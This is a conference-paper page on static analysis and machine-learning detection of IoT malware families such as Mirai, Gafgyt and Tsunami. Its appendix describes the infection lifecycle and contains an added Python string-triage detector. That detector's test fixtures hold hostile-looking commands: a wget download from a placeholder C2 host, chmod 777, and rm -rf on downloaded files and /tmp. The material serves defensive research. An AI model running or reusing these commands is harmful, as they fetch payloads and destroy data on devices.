Statically Dissecting Internet of Things Malware: Analysis, Characterization, and Detection

  • Conference paper
  • Information and Communications Security (ICICS 2020)

Part of the book series: Lecture Notes in Computer Science ((LNSC,volume 12282))

Abstract

Software vulnerabilities in emerging systems, such as the Internet of Things (IoT), allow for multiple attack vectors that are exploited by adversaries for malicious intents. One of such vectors is malware, where limited efforts have been dedicated to IoT malware analysis, characterization, and understanding. In this paper, we analyze recent IoT malware through the lenses of static analysis. Towards this, we reverse-engineer and perform a detailed analysis of almost 2,900 IoT malware samples of eight different architectures across multiple analysis directions. We conduct string analysis, unveiling operation, unique textual characteristics, and network dependencies. Through the control flow graph analysis, we unveil unique graph-theoretic features. Through the function analysis, we address obfuscation by function approximation. We then pursue two applications based on our analysis: 1) Combining various analysis aspects, we reconstruct the infection lifecycle of various prominent malware families, and 2) using multiple classes of features obtained from our static analysis, we design a machine learning-based detection model with features that are robust and an average detection rate of 99.8%.

Acknowledgments

This work was supported in part by a Collaborative Seed Award (2020) from Cyber Florida and NRF under NRF-2016K1A1A2912757.

Author information

Correspondence to Afsah Anwar or David Mohaisen.

A Appendix

A.1 Infection Process Reconstruction

The infection starts with a dictionary attack using parameterized user credentials. Upon successful access, the malware attempts to invoke BusyBox or to traverse to directories that are either named explicitly or passed as parameters. It then downloads payloads from a specified C2, for example over HTTP using wget. The downloaded file is given read, write, and execute permissions for all users with the chmod 777 command. The HTTP POST method is used to exfiltrate information from the host device to the C2. Once infected, the host participates in expanding the attack network by scanning IPs from a list of target IPs over a different port. Additionally, the presence of rm -rf indicates that the malware clears its traces to avoid detection. The malware finally launches a series of flooding attacks, using DNS amplification, HTTP, SNMP, wget, Junk, and TCP.

Although malware from different families follow a similar sequence towards their objectives, we observe differences in how they achieve those steps. Among the Tsunami family, we observe that the attack is device dependent, as shown by the occurrence of words such as Cisco, Oracle, Zte, and Dreambox. Table 8 shows that ≈83% of the Tsunami malware use IRC. For the Gafgyt family, we found that execution depends on successfully accessing the endpoint using explicitly mentioned credentials, such as default username-password combinations. Additionally, for the selection of target devices, we observe masked IP addresses (recall the presence of octet mask and full mask) and IP addresses stored in a file downloaded from the C2, as can be seen in Fig. 5. Table 8 also shows the infection strategy of Mirai, Tsunami, Gafgyt, and Lightaidra variants. It reports the samples within a variant that create or traverse directories, or that change access permissions. It also exhibits, per family, the prevalence of transport protocols used to carry out an attack, the methods used to download malicious shell scripts for infection, and the removal of executable files downloaded from the C2 after execution. We observe that 53 out of 64 Tsunami malware variants use IRC for infection. Although the table represents a single vector of malware behavior, that vector can have broad implications within a family. We, however, do not generalize the observation across architectures.

Fig. 5. Retrieving a list of target hosts.

Table 8. Infection statistics of malware families. Cre.: Create Directory, Trav.: Traverse Directory, Perm.: Access Permission, T.Pr.: Transport Protocol Used, R.Tr.: Remove Traces, T: TCP, U: UDP, W: wget, TF: TFTP, H: HTTP, G: GET; other abbreviations are in Table 2.
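As an added example (not code from the paper or its authors), the following Python script performs the kind of string-level triage behind A.1 and Table 8: it extracts printable strings from a binary, maps them to the lifecycle stages described above, and tallies per family how many samples exhibit each stage. The stage patterns, the `_fake_elf` helper and the sample contents are assumptions constructed for this example; the paper does not publish its indicator list.

```python
import re
from collections import defaultdict

# Indicators for the lifecycle stages that A.1 reconstructs from strings.
# These patterns are this example's own assumptions, not the paper's feature set.
STAGE_PATTERNS = {
    "access":           [rb"\bbusybox\b", rb"\bcd\s+/\S*"],
    "download":         [rb"\bwget\b", rb"\btftp\b", rb"https?://", rb"^GET\s"],
    "permission":       [rb"\bchmod\s+777\b"],
    "exfiltration":     [rb"^POST\s"],
    "trace_removal":    [rb"\brm\s+-rf\b"],
    "irc_c2":           [rb"\bPRIVMSG\b", rb"\bNICK\b", rb"\bJOIN\s+#"],
    "device_targeting": [rb"\bcisco\b", rb"\bdreambox\b", rb"\bzte\b", rb"\boracle\b"],
    "flood":            [rb"\bflood\b", rb"\bjunk\b", rb"\bsnmp\b"],
}
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # ASCII runs of 4+ bytes, as `strings` reports

def extract_strings(blob):
    """Return the printable ASCII strings in a raw binary (no disassembler needed)."""
    return PRINTABLE.findall(blob)

def lifecycle_stages(blob):
    """Map each lifecycle stage to the strings in `blob` that indicate it."""
    hits = defaultdict(list)
    for s in extract_strings(blob):
        for stage, patterns in STAGE_PATTERNS.items():
            if any(re.search(p, s, re.IGNORECASE) for p in patterns):
                hits[stage].append(s.decode("ascii"))
    return dict(hits)

def family_stats(samples):
    """Per family, count the samples that exhibit each stage (a Table 8-style tally)."""
    stats = defaultdict(lambda: defaultdict(int))
    for family, blob in samples:
        for stage in lifecycle_stages(blob):
            stats[family][stage] += 1
    return {family: dict(counts) for family, counts in stats.items()}

def _fake_elf(*strs):
    """Constructed stand-in for a sample: ELF magic followed by NUL-separated strings."""
    return b"\x7fELF\x00" + b"\x00".join(s.encode() for s in strs) + b"\x00"

# Constructed inputs that mirror the behaviours A.1 describes; not real samples.
SAMPLES = [
    ("gafgyt", _fake_elf("/bin/busybox", "cd /tmp", "wget http://C2-PLACEHOLDER/bins.sh",
                         "chmod 777 bins.sh", "rm -rf bins.sh", "POST /cgi-bin/ HTTP/1.1")),
    ("gafgyt", _fake_elf("/bin/busybox", "tftp -g -r x", "chmod 777 x", "junk flood")),
    ("tsunami", _fake_elf("NICK %s", "JOIN #chan", "PRIVMSG %s :%s", "cisco", "rm -rf /tmp/*")),
]
```

Running `family_stats(SAMPLES)` yields the per-family counts; on real corpora the same tally over extracted strings gives the Cre./Trav./Perm./R.Tr. columns of Table 8, though packed or encrypted strings will evade this kind of static check.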

A.2 Function Approximation

For malware samples that are stripped of their function names, we extract the CFG of each of their individual functions and manually compare it with the CFG of the main function from samples that retain a main function. For the ten malware samples we experimented on, we were able to approximate the main function.

Fig. 6. A sample disassembly of Mirai malware. Observe the 8th instruction, where the program branches to the obfuscated main function.

Copyright information

© 2020 Springer Nature Switzerland AG

Cite this paper

Anwar, A., Alasmary, H., Park, J., Wang, A., Chen, S., Mohaisen, D. (2020). Statically Dissecting Internet of Things Malware: Analysis, Characterization, and Detection. In: Meng, W., Gollmann, D., Jensen, C.D., Zhou, J. (eds) Information and Communications Security. ICICS 2020. Lecture Notes in Computer Science(), vol 12282. Springer, Cham. https://doi.org/10.1007/978-3-030-61078-4_25

  • DOI: https://doi.org/10.1007/978-3-030-61078-4_25

  • Publisher Name: Springer, Cham

  • Print ISBN: 978-3-030-61077-7

  • Online ISBN: 978-3-030-61078-4
